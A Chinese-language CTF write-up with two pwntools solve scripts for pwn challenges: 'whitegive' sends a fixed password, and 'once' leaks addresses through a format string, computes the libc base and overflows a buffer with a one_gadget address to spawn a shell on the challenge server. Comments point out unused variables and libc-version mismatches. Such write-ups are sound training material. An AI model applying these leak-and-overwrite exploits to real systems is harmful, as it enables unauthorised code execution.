没怎么做,就写了两题,另外两道没怎么看官方已经给出了writeup,不过第一周上的这些题感觉要把新手们劝退了……
whitegive
签到题直接调试看以下寄存器情况就知道了
 # Exploit harness setup: pwntools supplies process/remote, ELF, p64, success, args.
 from pwn import *
 # LibcSearcher is imported but never used in this script.
 from LibcSearcher import*
 context.log_level='debug'
 pe='./whitegive'
 ip,port = '182.92.108.71',30210
 # elf is loaded but not referenced below.
 elf=ELF(pe)
 # pwntools' args reads KEY=VALUE from the command line; run with REMOTE=1 to
 # target the challenge server, otherwise the local binary is spawned.
 if args['REMOTE']:
     p = remote(ip,port)
 else:
     p = process(pe)
  def get_one():
      """Return a table of libc offsets keyed on glibc version.

      NOTE(review): ``arch`` and ``version`` are not defined anywhere in this
      script and the function is never called; if neither branch matches,
      ``one`` is unbound and the ``return`` raises NameError.  The second
      script on this page carries a different set of 2.27 values.
      """
      if(arch == '64'):
          if(version == '2.23'):
              one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
          if (version == '2.27'):
              one = [0x4f365, 0x4f3c2, 0x10a45c]
      return one
 
  def main():
      """Solve 'whitegive': send the fixed answer, then hand the session to the user.

      Written for Python 2 / older pwntools (str literals where newer pwntools
      expects bytes).
      """
      p.recvuntil('password:')
      # 4202514 == 0x402012; per the note above the value was read off the
      # registers in a debugger.  What the binary does with it is not shown here.
      payload='4202514'
      success('payload = ' + payload)
      p.sendline(payload)
      p.interactive()
  # Script entry point.
  if __name__ == '__main__':
      main()
 
 
 
 
once
用libc-2.23的环境打通的,题目是2.27的,一些偏移需要调。
 # Exploit harness setup: pwntools supplies process/remote, ELF, p64, success, args.
 from pwn import *
 # LibcSearcher is imported but never used in this script.
 from LibcSearcher import*
 context.log_level='debug'
 pe='./once'
 libc_23='/lib/x86_64-linux-gnu/libc.so.6'
 libc_27='./libc-2.27.so'
 ip,port = '182.92.108.71',30210
 # elf is loaded but not referenced below.
 elf=ELF(pe)
 # Symbols are resolved against the local 2.23 libc only; libc_27 is assigned
 # but never used, so for the 2.27 remote (see the note above) the offsets in
 # main() have to be adjusted by hand.
 libc=ELF(libc_23)
 # pwntools' args reads KEY=VALUE from the command line; run with REMOTE=1 to
 # target the challenge server, otherwise the local binary is spawned.
 if args['REMOTE']:
     p = remote(ip,port)
 else:
     p = process(pe)
  def get_one():
      """Return a table of libc offsets keyed on glibc version.

      NOTE(review): ``arch`` and ``version`` are not defined anywhere in this
      script and the function is never called — main() hard-codes 0x45226,
      the first 2.23 entry, instead.  If neither branch matches, ``one`` is
      unbound and the ``return`` raises NameError.
      """
      if(arch == '64'):
          if(version == '2.23'):
              one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
          if (version == '2.27'):
              one = [0x4f3d5, 0x4f432, 0x10a41c]
      return one
 
  def main():
      """Two-round solve for 'once', as run against the local glibc-2.23 libc.

      Round 1 sends a format string and reads two values back; the second is
      used to compute the libc load offset.  Round 2 sends a padded payload
      whose last 8 bytes are that offset plus a fixed 2.23 constant.  The note
      above says the remote is 2.27, so the ``-240`` adjustment and ``0x45226``
      below are 2.23 values and need changing for the real target.

      Written for Python 2 / older pwntools (str literals where newer pwntools
      expects bytes).
      """
      # Binary-relative addresses.  pop_ret is never used; start only shows up
      # through its low two bytes ('\xD2\x11' == 0x11D2) in the payload below.
      pop_ret= 0x0000000000001283
      start=0x00000000000011D2
      p.recvuntil('It is your turn: ')
      # %11$p / %13$p are positional format-string reads; presumably the program
      # echoes the input through a printf-family call, which is what the two
      # recv(14) calls below rely on.  The 30 NULs plus 0x11D2 are sized for
      # this binary's layout — confirm against the binary if it changes.
      payload='%11$p'+'%13$p'+'\x00'*30+'\xD2\x11'
      p.send(payload)
      # Each leaked value prints as 14 chars: '0x' + 12 hex digits.
      vuln=int(p.recv(14),16)
      print(type(vuln))  # debug leftover
      # Assumes the second leak is a return into __libc_start_main, 240 bytes
      # past the symbol on the local 2.23 libc; that distance differs on 2.27.
      libc_start_main_addr=int(p.recv(14),16)-240
      print(type(libc_start_main_addr))  # debug leftover
      success('vuln = ' + hex(vuln))
      success("libc_start_main = "+ hex(libc_start_main_addr))
      bin_sh_libc=next(libc.search("/bin/sh"))
      system_libc=libc.symbols['system']
      libc_start_main_libc=libc.symbols['__libc_start_main']
      # offset == libc load base (leaked address minus the symbol's file offset).
      offset=int(libc_start_main_addr)-libc_start_main_libc
      # system_addr and bin_addr are computed and logged only; payload1 does not use them.
      system_addr=system_libc+offset
      bin_addr=bin_sh_libc+offset
      success('offset: ' + hex(offset))
      success("system: " + hex(system_addr))
      success("bin_addr: " + hex(bin_addr))
      p.recvuntil('turn: ')
      # Unused.
      pop=vuln+177
      # 0x45226 is the first 2.23 entry of get_one()'s table, hard-coded rather
      # than looked up; 0x28 bytes of padding precede the 8-byte value.
      payload1='\x00'*0x28+p64(offset+0x45226)
      p.sendline(payload1)

      p.interactive()
  # Script entry point.
  if __name__ == '__main__':
      main()
 
 
 